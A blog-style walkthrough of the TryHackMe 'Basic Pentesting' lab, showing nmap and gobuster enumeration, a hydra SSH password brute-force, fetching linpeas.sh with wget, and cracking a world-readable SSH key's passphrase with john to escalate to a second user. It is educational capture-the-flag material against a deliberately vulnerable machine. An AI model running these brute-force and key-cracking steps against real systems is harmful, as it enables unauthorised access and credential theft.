Basic Pen-testing (https://tryhackme.com/room/basicpentestingjt) is a room in TryHackMe designed to cover the basics of Web App Hacking and privilege escalation.
It's a part of the Complete Beginner learning path.
Fire up the machine, connect via openVPN and wait for your ip to show up. Mine was 10.10.90.250.
Ping to ensure that the host is up and you can reach the host.
Start with an nmap scan. I did a simple scan to see that ports 22, 80, 139 and 445 were open and then did the proper scan only on these ports:
┌──(x117㉿kali)-[~]
└─$ nmap -p 22,80,139,445 -sC -sV 10.10.90.250
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 00:56 IST
Nmap scan report for 10.10.90.250
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m05s, deviation: 2h18m34s, median: 4s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2021-07-23T15:27:16-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-23T19:27:16
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.99 seconds
Port 80 is open so tried to visit the website running on that port. Checked for the robots.txt -> Not found. Checked the page source for interesting comments.
<!-- Check our dev note section if you need to know what to work on. -->
Tried to visit http://10.10.90.250/dev but in vain. So it was time to run gobuster to bruteforce for directories and files of interest in the website.
┌──(x117㉿kali)-[~]
└─$ gobuster dir -u http://10.10.90.250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,zip
=
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.90.250
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,zip,php
[+] Timeout: 10s
===============================================================
2021/07/24 00:59:21 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 158]
/development (Status: 301) [Size: 318] [--> http://10.10.90.250/development/]
Progress: 60945 / 438325 (13.90%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/07/24 01:18:20 Finished
===============================================================
Almost immediately we find http://10.10.90.250/development/. On visiting the page, we see that we have access to two files : dev.txt, j.txt
dev.txt :
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
j.txt :
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
Doesn't help much, does it? Except for the fact that the name of one of the users 'may' start with j or k!
On enumerating with enum4linux, we find the names of the users in question.
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Since ssh is open, we can try brute-forcing for their password using hydra.
┌──(x117㉿kali)-[~/Desktop/THM/BasicPentesting]
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.249.144 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-24 13:30:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.249.144:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active
[STATUS] 117.67 tries/min, 353 tries in 00:03h, 14344051 to do in 2031:45h, 16 active
[22][ssh] host: 10.10.249.144 login: jan password: <censored>
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-24 13:37:47
Didn't get results for the user kay, but got the password for user jan. You can use any wordlist for the bruteforcing, but in CTFs or challenges like these, (which are intentionally made solvable, in order to help students!) it's always recommended to use common wordlists like rockyou.txt. Most of the times words are deliberately picked from these wordlists. (Again, this is NOT AT ALL relevant for real world scenarios!)
The password for jan turns out to be <censored>
So sshed as user jan(ssh jan@10.10.90.250) and started looking around in the file system. Did some basic manual enumeration :
- Logged in as kay.
- Very under-privileged user!!
- No interesting files(
ls -la) - Checked /home(
cd /home) - 2 users jan and kay
- Checked the files and directories of kay.(
ls -la /home/kay) - Few interesting ones but with no read permissions
- Tried running
sudo -l: Can't run sudo - Checked SUIDs(
find / -perm -u=s -type f 2>/dev/null). Nothing interesting - Checked crontabs(
cat /etc/crontab). Nothing interesting
Time to call linpeas.sh! I observed that I had no write permissions even inside jan's home directory. So changed directory to /tmp, where I had permissions to create files.
I set up a simple http server on the port 8080 of my local machine and used wget to download linpeas.sh.
┌──(x117㉿kali)-[~/Desktop/THM/BasicPentesting]
└─$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
wget <machine_ip>:8080/linpeas.sh
(Replace <machine_ip> with the ip provided by THM when you connect via openVPN(Not your own machine's public ip))
You can also use the scp command to securely transfer files.
Ran linpeas.sh on the system, to realise that /home/kay/.ssh/id_rsa had read permissions for all!
Copied the private key in the local system and tried logging in as kay. But it seemed to be passphrase protected.
Used john to crack the pass-phrase.
-$ /usr/share/john/ssh2john.py kay.id_rsa > kay.hash
-$ john kay.hash
passphrase : <censored>
Used the key to login as kay and read the file pass.bak
┌──(x117㉿kali)-[~/Desktop/THM/BasicPentesting]
└─$ ssh -i kay.id_rsa kay@10.10.91.12 1 ⨯
load pubkey "kay.id_rsa": invalid format
The authenticity of host '10.10.91.12 (10.10.91.12)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.91.12' (ECDSA) to the list of known hosts.
Enter passphrase for key 'kay.id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
<censored>
That was it for the challenge!
Top comments (0)